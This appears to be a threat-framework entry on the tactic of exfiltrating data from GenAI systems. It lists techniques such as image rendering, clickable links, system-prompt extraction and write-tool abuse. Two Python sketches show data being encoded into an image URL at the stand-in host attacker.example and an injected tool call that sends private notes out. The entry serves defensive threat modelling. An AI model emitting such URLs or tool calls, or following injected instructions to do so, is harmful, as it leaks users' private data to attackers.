Exfiltration

Type: tactic

Description: The adversary is trying to steal data or other information from your GenAI system.

Version: 0.1.0

Created At: 2025-07-23 10:23:39 -0400

Last Modified At: 2025-07-23 10:23:39 -0400

Tactic Order: 15


Related Techniques

  • <-- Web Request Triggering (technique): An adversary can exfiltrate data by embedding it in a URI and triggering the AI system to query it via its browsing capabilities.
  • <-- Abuse Trusted Sites (technique): An adversary can exfiltrate data by hosting attacker-controlled endpoints on trusted domains.
  • <-- LLM Data Leakage (technique): Exploiting data leakage vulnerabilities in large language models to retrieve sensitive or unintended information.
  • <-- Extract LLM System Prompt (technique): Extracting the AI system's instructions and exfiltrating them outside the organization.
  • <-- Exfiltration via ML Inference API (technique): Exfiltrating data by exploiting machine learning inference APIs to extract sensitive information.
  • <-- Clickable Link Rendering (technique): An adversary can exfiltrate data by embedding it in the parameters of a URL and getting the AI system to render it as a clickable link, which the user then clicks.
  • <-- Image Rendering (technique): An adversary can exfiltrate data by embedding it in the query parameters of an image URL and getting the AI system to render the image (see the first sketch following this list).
  • <-- Exfiltration via Cyber Means (technique): Using cyber means, such as data transfers or network-based methods, to exfiltrate machine learning artifacts or sensitive data.
  • <-- Write Tool Invocation (technique): An adversary can exfiltrate data by encoding it into the input of an invocable tool capable of performing a write operation (see the second sketch following this list).
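
The URL-based channels above (Web Request Triggering, Clickable Link Rendering, Image Rendering) share one mechanic: the stolen data rides in the query string of an attacker-controlled URL that the AI system is induced to emit or fetch. The following is a minimal sketch under assumed names; the endpoint `attacker.example`, the `d` parameter, and the auto-rendering chat client are illustrative, not taken from any real incident.

```python
import base64

# Hypothetical attacker-controlled collection endpoint (illustrative only).
ATTACKER_ENDPOINT = "https://attacker.example/collect"

def build_exfil_markdown(stolen_text: str) -> str:
    """Encode stolen data into the query string of an image URL.

    If injected instructions get the AI system to emit this markdown, a chat
    client that auto-renders images issues a GET request to the attacker's
    server, delivering the payload with no user action. Emitting the same URL
    as a normal [link](...) instead gives the clickable-link variant, which
    requires one click from the user.
    """
    payload = base64.urlsafe_b64encode(stolen_text.encode()).decode()
    return f"![loading]({ATTACKER_ENDPOINT}?d={payload})"

if __name__ == "__main__":
    # Data the injected prompt told the model to collect from the conversation.
    print(build_exfil_markdown("internal project codename and API key"))
```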
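
For the write-tool channel, the second sketch below assumes a toy agent with a single hypothetical write-capable tool named `create_issue`; the tool name, arguments, and dispatch logic are invented for illustration and do not correspond to any specific framework.

```python
def create_issue(title: str, body: str) -> None:
    """Hypothetical write-capable tool: posts an issue to an external tracker."""
    print(f"POST https://tracker.example/issues title={title!r} body={body!r}")

TOOLS = {"create_issue": create_issue}

# A tool call the adversary steers the agent into making, e.g. via instructions
# hidden in a retrieved document. The sensitive data rides inside the arguments.
injected_call = {
    "tool": "create_issue",
    "arguments": {
        "title": "weekly status",
        "body": "status summary... plus the contents of the user's private notes",
    },
}

# If the agent executes the call, the write operation carries the data across
# the organization's boundary to wherever the tool delivers it.
TOOLS[injected_call["tool"]](**injected_call["arguments"])
```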